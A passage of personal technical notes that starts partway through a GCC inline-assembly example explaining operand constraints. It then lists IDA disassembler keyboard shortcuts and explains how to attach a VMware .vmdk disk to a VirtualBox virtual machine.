        "add %2, %0"        /* 1: AT&T operand order, %0 += %2 */
        : "=r"(c)           /* 2: output; a register, so the add always has a valid operand pair */
        : "0"(a), "g"(b)    /* 3: %1 shares %0's register (c starts out as a); %2 may be reg, mem or imm */
        : "cc"              /* 4: the add changes the flags */
    );
    printf("%x\n", c);      /* prints 3 */
    return 0;
}

The output constraint has to be "r" rather than "g": with "g" on both the output and %2 the compiler may pick memory for both, and x86 has no add with two memory operands.

IDA shortcuts

Shortcut      Action
Alt+T         Search text
Ctrl+1        Quick View navigation
Space         Toggle between graph view and assembly view
Shift+F3      Switch to the Functions window
Shift+F4      Switch to the Names window
Shift+F7      Switch to the Segments window
Shift+F12     Switch to the Strings window
Inside IDA View:
Ctrl+Enter    Forward (follow a function call)
Esc           Back (return from a function call)

VMware's default disk image format is .vmdk; VirtualBox's is .vdi. VirtualBox lets you choose the format when you create a virtual machine, and it can attach a .vmdk directly.

To import a .vmdk image into VirtualBox, create a new virtual machine and choose not to create a virtual hard disk.

Ignore the warning and continue.

Once the machine exists, open its Settings and add the .vmdk file as its virtual hard disk (Storage, then the controller, then add an existing disk).

That is all it takes.

If a Windows guest then fails to boot, try enabling I/O APIC (System, Motherboard tab in the VM settings).
